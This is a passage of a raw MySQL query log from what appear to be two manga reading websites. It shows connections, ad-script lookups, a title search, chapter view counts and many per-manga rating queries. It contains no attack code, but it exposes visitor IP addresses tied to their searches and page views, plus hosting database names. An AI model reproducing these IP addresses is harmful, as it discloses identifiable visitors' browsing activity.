ASC, id DESC LIMIT 1 330659485 Quit 330659486 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659487 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659486 Quit 330659487 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659487 Quit 330659468 Quit 330659488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659488 Quit 330659489 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659489 Quit 330659490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659490 Quit 330659491 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659491 Quit 330659492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659492 Quit 330659493 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659493 Quit 330659494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659495 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659494 Quit 330659495 Quit 260225 19:30:06 330659496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659496 Quit 330659497 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('A sign of affection', '2a02:2788:39:fb2f:2079:67cc:a863:aafe', '2026-02-26 03:30:06') 330659497 Quit 330659498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659498 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%A sign of affection%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%A sign of affection%' ) ) 330659498 Quit 330659499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659499 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'A sign of affection ' 330659499 Quit 330659500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659500 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330659501 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659502 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659501 Quit 330659502 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8064' and m.active = 1 330659502 Quit 330659503 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659503 Query select * FROM chapters where id = '8064' 330659503 Quit 330659504 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659504 Query select * FROM chapters where manga_id = '35' order by display_priority ASC, id desc 330659504 Quit 330659505 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659505 Query Update chapters set view=view+1 where id = '8064' 330659505 Quit 330659506 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659506 Query select * FROM chapters where id = '8064' 330659506 Quit 330659507 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659507 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8064' and m.active = 1 330659507 Quit 330659508 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659508 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('35', '8064', '75.72.250.102', 'mangaberri.com', '2026-02-26 03:30:06', '2026-02-26 03:30:06') 330659508 Quit 330659509 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659509 Query select * FROM chapter_images where chapter_id = '8064' 330659509 Quit 330659510 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659510 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330659510 Quit 330659511 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659511 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Fantasy%' OR genres like '%Military%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330659500 Quit 330659512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659512 Quit 330659513 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659513 Quit 330659514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330659514 Quit 330659511 Quit 330659515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330659515 Quit 330659516 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330659517 Quit 330659519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330659518 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659519 Quit 330659516 Quit 330659518 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659518 Quit 330659520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330659520 Quit 330659521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330659521 Quit 330659522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330659523 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659522 Quit 330659525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659524 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330659523 Quit 330659525 Quit 330659524 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659524 Quit 330659526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330659526 Quit 330659527 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659529 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330659528 Quit 330659527 Quit 330659529 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659529 Quit 330659530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330659530 Quit 330659531 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330659533 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659532 Quit 330659531 Quit 330659533 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659533 Quit 330659534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330659534 Quit 330659535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330659535 Quit 330659536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330659536 Quit 330659537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330659537 Quit 330659538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330659538 Quit 330659539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330659539 Quit 330659540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330659540 Quit 330659541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330659541 Quit 330659542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330659542 Quit 330659543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330659543 Quit 330659544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330659544 Quit 330659545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330659545 Quit 330659546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330659546 Quit 330659547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330659547 Quit 330659548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330659548 Quit 330659549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330659549 Quit 330659550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330659550 Quit 330659551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330659551 Quit 330659552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330659552 Quit 330659553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330659553 Quit 330659554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330659554 Quit 330659555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330659555 Quit 330659556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330659556 Quit 330659557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330659557 Quit 330659558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330659558 Quit 330659559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330659559 Quit 330659560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330659560 Quit 330659561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330659561 Quit 330659562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330659562 Quit 330659563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330659563 Quit 330659564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330659564 Quit 330659565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330659565 Quit 330659566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330659566 Quit 330659567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330659567 Quit 330659568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330659568 Quit 330659569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330659569 Quit 330659570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330659570 Quit 330659571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330659571 Quit 330659572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330659572 Quit 330659573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330659573 Quit 330659574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330659574 Quit 330659575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330659575 Quit 330659576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330659576 Quit 330659577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330659577 Quit 330659578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330659578 Quit 330659579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330659579 Quit 330659580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330659580 Quit 330659581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330659581 Quit 330659582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330659582 Quit 330659583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330659583 Quit 330659584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330659584 Quit 330659585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330659585 Quit 330659586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330659586 Quit 330659587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330659587 Quit 330659588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330659588 Quit 330659589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330659589 Quit 330659590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330659590 Quit 330659591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330659591 Quit 330659592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330659592 Quit 330659593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330659593 Quit 330659594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330659594 Quit 330659595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330659595 Quit 330659596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330659596 Quit 330659597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330659597 Quit 330659598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330659598 Quit 330659599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330659599 Quit 330659600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330659600 Quit 330659601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330659601 Quit 330659602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330659602 Quit 330659603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330659603 Quit 330659604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330659604 Quit 330659605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330659605 Quit 330659606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330659606 Quit 330659607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330659607 Quit 330659608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330659608 Quit 330659609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330659609 Quit 330659610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330659610 Quit 330659611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330659611 Quit 330659612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330659612 Quit 330659613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330659613 Quit 330659614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330659614 Quit 330659615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330659615 Quit 330659616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330659616 Quit 330659617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330659617 Quit 330659618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330659618 Quit 330659619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330659619 Quit 330659620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330659620 Quit 330659621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330659621 Quit 330659622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330659622 Quit 330659623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330659623 Quit 330659624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330659624 Quit 330659625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330659625 Quit 330659626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330659626 Quit 330659627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330659627 Quit 330659628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330659628 Quit 330659629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330659629 Quit 330659630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330659630 Quit 330659631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330659631 Quit 330659632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330659632 Quit 330659633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330659633 Quit 330659634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330659634 Quit 330659635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330659635 Quit 330659636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330659636 Quit 330659637 Connect 